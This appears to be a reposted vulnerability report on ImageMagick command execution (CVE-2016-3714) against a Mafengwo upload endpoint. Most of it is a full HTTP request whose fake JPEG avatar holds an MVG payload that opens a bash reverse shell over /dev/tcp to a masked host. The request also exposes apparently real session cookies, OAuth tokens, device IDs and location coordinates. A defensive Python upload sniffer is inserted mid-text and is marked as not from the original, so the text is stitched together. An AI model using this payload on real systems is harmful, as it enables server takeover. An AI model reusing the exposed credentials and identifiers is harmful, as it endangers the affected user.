Remote command execution on a Mafengwo site
程序员文章站
2022-04-07 16:12:13
Target: Mafengwo iOS app
The avatar upload endpoint is vulnerable to CVE-2016-3714 (ImageMagick command execution). Analysis:
POST https://m.mafengwo.cn/nb/public/xauth_change_user.php HTTP/1.1
Host: m.mafengwo.cn
Content-Type: multipart/form-data; boundary=Boundary+454EDE5BD920AC77
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=ge39jptbg3r1hujdm9bhgqps55; __idfa=564443CC-9189-42C1-9CC9-0922116AD5C4; __idfv=CA34ED38-8E5B-4526-ADC2-201F233A5707; __mfwuuid=a811fb2e-75d5-fbb3-07c4-23a20157abf8; __openudid=34c68951fec87de860a9802862152f33442f8c37; mfw_uid=91729966; mfw_uuid=572b4a14-f864-0900-2f51-39ea5fc6ed2c; oad_n=a%3A3%3A%7Bs%3A3%3A%22oid%22%3Bi%3A2581%3Bs%3A2%3A%22dm%22%3Bs%3A13%3A%22m.mafengwo.cn%22%3Bs%3A2%3A%22ft%22%3Bs%3A19%3A%222016-05-05+21%3A26%3A44%22%3B%7D
Connection: keep-alive
Proxy-Connection: keep-alive
Accept: */*
User-Agent: TravelGuideMdd/7.4.4 (iPhone; iOS 9.3.1; Scale/2.00),Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Mobile/13E238 mfwappcode/cn.mafengwo.www mfwappver/7.4.4 mfwsdk/20160401 mfwjssdk/0.1
Accept-Language: zh-Hans-CN;q=1, en-US;q=0.9
Content-Length: 2731
Accept-Webp: 1

--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="app_code"

cn.mafengwo.www
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="app_ver"

7.4.4
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="channel_id"

App Store
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="device_token"

95d871b76de2867dc8723af43a258c990fc6c6f5a565fccc20410adcd4e73f23
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="device_type"

ios
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="hardware_model"

iPhone8,1
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="idfa"

564443CC-9189-42C1-9CC9-0922116AD5C4
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="idfv"

CA34ED38-8E5B-4526-ADC2-201F233A5707
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="mfwsdk_ver"

20160401
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="o_lat"

22.614055
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="o_lng"

114.035890
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_consumer_key"

4
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_nonce"

841a666f5d33a774deab83527c05188c
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_signature"

eL4MWstOj/x9mADziX8rlQHsgA0=
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_signature_method"

HMAC-SHA1
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_timestamp"

1462455168
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_token"

91729966_778cee2f668645fee3e66a124d659eae
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="oauth_version"

1.0
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="open_udid"

34c68951fec87de860a9802862152f33442f8c37
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="screen_scale"

2
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="sys_ver"

9.3.1
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="time_offset"

480
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="uid"

91729966
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="x_auth_mode"

client_auth
--Boundary+454EDE5BD920AC77
Content-Disposition: form-data; name="ulogo"; filename="ulogo"
Content-Type: image/jpeg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/xxx.xxx.xxx/2015 0>&1")'
pop graphic-context
--Boundary+454EDE5BD920AC77--
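The request above declares the avatar part as Content-Type: image/jpeg, but the body is an ImageMagick MVG script, which is what the CVE-2016-3714 coder path acts on. The following server-side check is an added example, not code from the original report or from Mafengwo: it decides on the uploaded bytes rather than on the client-supplied Content-Type or filename, and rejects bodies that are ImageMagick scripts before anything hands them to ImageMagick. The raster allow-list, the script patterns and the sample inputs are constructed for the example.

```python
import re

# Constructed allow-list: magic bytes of raster formats an avatar may be.
RASTER_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# Leading tokens of the text-based ImageMagick inputs (MVG, SVG, XML wrappers)
# that an uploaded "image" should never start with.
SCRIPT_PATTERNS = (
    re.compile(rb"^\s*push\s+graphic-context", re.I),  # MVG, as in the request above
    re.compile(rb"^\s*viewbox\b", re.I),               # MVG without the leading push
    re.compile(rb"<\s*svg\b", re.I),                   # SVG
    re.compile(rb"<\s*!DOCTYPE", re.I),
    re.compile(rb"<\?xml", re.I),
)

def sniff_upload(data: bytes, declared_type: str) -> tuple:
    """Return (accepted, reason). The decision rests on the bytes only;
    declared_type is compared afterwards so a mismatch can be logged."""
    head = data[:16]
    detected = next((fmt for magic, fmt in RASTER_MAGIC.items()
                     if head.startswith(magic)), None)
    if detected is None:
        # Only look at the start: the coder is chosen from the leading bytes.
        if any(p.search(data[:512]) for p in SCRIPT_PATTERNS):
            return False, "body is an ImageMagick script (MVG/SVG), not a raster image"
        return False, "unrecognised or unsupported image format"
    if declared_type.lower() != f"image/{detected}":
        return True, f"accepted as {detected} (declared {declared_type} disagrees)"
    return True, f"accepted as {detected}"

# Constructed sample inputs: an MVG body shaped like the one in the request
# above (without the injected command) and a minimal JPEG header.
MVG_SAMPLE = (b"push graphic-context\n"
              b"viewbox 0 0 640 480\n"
              b"fill 'url(https://example.com/image.jpg)'\n"
              b"pop graphic-context\n")
JPEG_STUB = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32

if __name__ == "__main__":
    print(sniff_upload(MVG_SAMPLE, "image/jpeg"))   # rejected as a script
    print(sniff_upload(JPEG_STUB, "image/jpeg"))    # accepted as jpeg
```

A mismatch between declared type and detected bytes is accepted here but reported in the reason string, which is the signal worth alerting on in upload logs.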
Reverse shell
Solution:
Please advise~